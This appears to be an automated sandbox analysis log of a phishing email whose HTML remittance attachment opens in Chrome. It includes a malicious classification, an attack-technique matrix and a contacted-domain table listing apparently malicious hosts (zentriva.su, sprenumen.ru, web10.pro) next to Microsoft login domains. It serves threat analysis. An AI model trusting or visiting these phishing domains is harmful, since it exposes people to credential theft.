    Source: unknownHTTPS traffic detected: 20.190.160.20:443 -> 192.168.2.16:57801 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.16:57803 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:57806 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:57807 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.16:57989 version: TLS 1.2
    Source: classification engineClassification label: mal52.phis.winEML@42/103@74/390
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\Documents\Outlook Files\~Outlook Data File - NoEmail.pst.tmp
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20241007T0835180437-6728.etl
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile read: C:\Users\desktop.ini
    Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\Desktop\original.eml"
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "FF7B597F-3020-4A6F-8172-218BC05F430F" "A618A75E-1B2B-41BA-B15A-12C1C9B0E6F3" "6728" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\DAFUMPZW\Metalus Remittance_7420249835_11053465.html
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "FF7B597F-3020-4A6F-8172-218BC05F430F" "A618A75E-1B2B-41BA-B15A-12C1C9B0E6F3" "6728" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 --field-trial-handle=1944,i,3455865811790200313,8750311825173435097,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://aka.ms/LearnAboutSenderIdentification
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=1844,i,8970548161277558720,12195311957042810965,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE "C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\DAFUMPZW\phish_alert_sp2_2.0.0.0.eml"
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\DAFUMPZW\Metalus Remittance_7420249835_11053465.html
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://aka.ms/LearnAboutSenderIdentification
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 --field-trial-handle=1944,i,3455865811790200313,8750311825173435097,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=1844,i,8970548161277558720,12195311957042810965,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\DAFUMPZW\Metalus Remittance_7420249835_11053465 (003).html
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2124 --field-trial-handle=1928,i,4118263844888920036,16677394294465106818,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE "C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\DAFUMPZW\phish_alert_sp2_2.0.0.0.eml"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\DAFUMPZW\Metalus Remittance_7420249835_11053465 (003).html
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2124 --field-trial-handle=1928,i,4118263844888920036,16677394294465106818,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: apphelp.dll
    Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: c2r64.dll
    Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: userenv.dll
    Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: msasn1.dll
    Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: kernel.appcore.dll
    Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptsp.dll
    Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: rsaenh.dll
    Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptbase.dll
    Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: gpapi.dll
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{F959DBBB-3867-41F2-8E5F-3B8BEFAA81B3}\InprocServer32
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEWindow found: window name: SysTabControl32
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile Volume queried: C:\Windows\SysWOW64 FullSizeInformation
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information queried: ProcessInformation
    Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeQueries volume information: C:\Program Files (x86)\Microsoft Office\root\Office16\AI\WordCombinedFloatieLreOnline.onnx VolumeInformation
    Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information1
    Scripting
    1
    Drive-by Compromise
    Windows Management Instrumentation1
    Scripting
    1
    Process Injection
    1
    Masquerading
    OS Credential Dumping1
    Process Discovery
    Remote ServicesData from Local System2
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/Job1
    Registry Run Keys / Startup Folder
    1
    Registry Run Keys / Startup Folder
    1
    Process Injection
    LSASS Memory1
    File and Directory Discovery
    Remote Desktop ProtocolData from Removable Media1
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAt1
    DLL Side-Loading
    1
    DLL Side-Loading
    1
    Deobfuscate/Decode Files or Information
    Security Account Manager13
    System Information Discovery
    SMB/Windows Admin SharesData from Network Shared Drive2
    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
    Extra Window Memory Injection
    1
    DLL Side-Loading
    NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    Extra Window Memory Injection
    LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    NameIPActiveMaliciousAntivirus DetectionReputation
    a.nel.cloudflare.com
    35.190.80.1
    truefalse
      unknown
      s-part-0044.t-0009.fb-t-msedge.net
      13.107.253.72
      truefalse
        unknown
        xqe94soygyl0xmmn7oi0raibl6rn1ojg7he0qyjbvy1xxkrsv028hloblup.zentriva.su
        188.114.96.3
        truefalse
          unknown
          microsoftwindows.112.2o7.net
          63.140.62.17
          truefalse
            unknown
            sni1gl.wpc.alphacdn.net
            152.199.21.175
            truefalse
              unknown
              s-part-0017.t-0009.t-msedge.net
              13.107.246.45
              truefalse
                unknown
                s-part-0017.t-0009.fb-t-msedge.net
                13.107.253.45
                truefalse
                  unknown
                  aka.ms
                  92.122.18.57
                  truefalse
                    unknown
                    s-part-0039.t-0009.t-msedge.net
                    13.107.246.67
                    truefalse
                      unknown
                      noon.com
                      104.17.200.204
                      truefalse
                        unknown
                        web10.pro
                        69.49.245.172
                        truefalse
                          unknown
                          code.jquery.com
                          151.101.66.137
                          truefalse
                            unknown
                            cdnjs.cloudflare.com
                            104.17.24.14
                            truefalse
                              unknown
                              cyt.sprenumen.ru
                              188.114.97.3
                              truefalse
                                unknown
                                challenges.cloudflare.com
                                104.18.95.41
                                truefalse
                                  unknown
                                  sni1gl.wpc.omegacdn.net
                                  152.199.21.175
                                  truefalse
                                    unknown
                                    www.google.com
                                    142.250.74.196
                                    truefalse
                                      unknown
                                      s-part-0032.t-0009.t-msedge.net
                                      13.107.246.60
                                      truefalse
                                        unknown
                                        js.monitor.azure.com
                                        unknown
                                        unknownfalse
                                          unknown
                                          aadcdn.msftauth.net
                                          unknown
                                          unknownfalse
                                            unknown
                                            logincdn.msftauth.net
                                            unknown
                                            unknownfalse
                                              unknown
                                              assets.onestore.ms
                                              unknown
                                              unknownfalse
                                                unknown
                                                mem.gfx.ms
                                                unknown
                                                unknownfalse
                                                  unknown
                                                  c.s-microsoft.com
                                                  unknown
                                                  unknownfalse
                                                    unknown
                                                    support.content.office.net
                                                    unknown
                                                    unknownfalse
                                                      unknown
                                                      login.microsoftonline.com
                                                      unknown
                                                      unknownfalse
                                                        unknown
                                                        acctcdn.msftauth.net
                                                        unknown
                                                        unknownfalse
                                                          unknown
                                                          www.noon.com
                                                          unknown
                                                          unknownfalse
                                                            unknown
